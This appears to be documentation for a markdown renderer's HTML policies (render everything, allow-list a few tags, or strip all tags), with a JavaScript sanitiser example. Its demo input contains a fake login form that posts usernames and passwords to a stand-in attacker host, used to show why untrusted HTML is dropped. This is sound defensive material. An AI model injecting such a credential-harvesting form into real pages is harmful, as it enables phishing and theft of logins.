Every HTML tag survives into the DOM. Iframes load, forms render, styles apply — only safe with content you fully trust.
iframe, form, and style.
This paragraph has bold and italic markdown formatting.
HTML strong tag and HTML em tag.
Allow-list a tight set of formatting tags via allowHtmlOnly. Script, iframe, and anything else dangerous drops silently.
allowHtmlOnly — only those tags render, everything else drops out silently.
<strong>, <em>, and <a> while killing script + iframe vectors.
This paragraph has bold and italic markdown formatting.
HTML strong tag and HTML em tag.
Strip every HTML tag via buildUnsupportedHTML — markdown formatting only, raw HTML stripped from the output.
buildUnsupportedHTML() returns a renderer map that drops every HTML tag — only markdown formatting survives.
This paragraph has bold and italic markdown formatting.
<div> This is inside a raw HTML div element. </div>
<strong>HTML strong tag</strong> and <em>HTML em tag</em>.
<details><summary>Click to expand</summary> Hidden content inside details/summary tags. </details>
<iframe src="https://example.com" title="example iframe"><iframe src="https://example.com" title="example iframe"></iframe>
<form action="https://evil.example.com/steal" method="POST">
<strong>Fake login injected by untrusted markdown</strong>
<input type="text" placeholder="Username"><input type="text" placeholder="Username"/></input>
<input type="password" placeholder="Password"><input type="password" placeholder="Password"/></input>
<button type="submit">Sign in</button>
</form>
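The three policies above, modelled on a constructed node tree. This is an added example, not the library's own code: renderWithPolicy, the node shape, the per-tag attribute list and the drop-the-whole-subtree behaviour are assumptions. It goes one step past the page by also filtering attributes on allow-listed tags, because allowing <a> still leaves its attributes to be checked.

```javascript
// Added example, not the library's code. Node shape, renderWithPolicy and the
// drop-whole-subtree behaviour are assumptions made for illustration.
const esc = (s) => String(s).replace(/[&<>"']/g, (c) =>
  ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
const el = (tag, attrs, ...children) => ({ type: 'element', tag, attrs, children });
const txt = (value) => ({ type: 'text', value });

// Attributes kept per allow-listed tag; any attribute not named here is discarded.
const SAFE_ATTRS = { a: ['href', 'title'] };
const SAFE_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

function safeHref(value) {
  try {
    // Relative links resolve against a placeholder base and inherit its https scheme.
    return SAFE_SCHEMES.has(new URL(value, 'https://placeholder.invalid/').protocol);
  } catch {
    return false;
  }
}

// policy: 'all' (trusted content), 'none' (strip everything), or a Set of tag names.
function renderWithPolicy(nodes, policy) {
  return nodes.map((n) => {
    if (n.type === 'text') return esc(n.value);
    const tag = n.tag.toLowerCase();
    if (policy !== 'all' && !(policy instanceof Set && policy.has(tag))) {
      return ''; // element and its whole subtree are dropped, not unwrapped
    }
    const attrs = Object.keys(n.attrs || {})
      .filter((k) => policy === 'all' || (SAFE_ATTRS[tag] || []).includes(k))
      .filter((k) => policy === 'all' || k !== 'href' || safeHref(n.attrs[k]))
      .map((k) => ` ${k}="${esc(n.attrs[k])}"`).join('');
    return `<${tag}${attrs}>${renderWithPolicy(n.children, policy)}</${tag}>`;
  }).join('');
}

// Constructed sample mirroring the page's demo input.
const SAMPLE = [
  el('strong', {}, txt('HTML strong tag')), txt(' and '), el('em', {}, txt('HTML em tag')),
  el('iframe', { src: 'https://example.com', title: 'example iframe' }),
  el('form', { action: 'https://evil.example.com/steal', method: 'POST' },
    el('strong', {}, txt('Fake login injected by untrusted markdown')),
    el('button', { type: 'submit' }, txt('Sign in'))),
];

const TIGHT = new Set(['strong', 'em', 'a']);
console.log(renderWithPolicy(SAMPLE, TIGHT));
```

Dropping the subtree rather than unwrapping it is what keeps the "Fake login" text inside the form from surviving even though <strong> itself is on the allow-list.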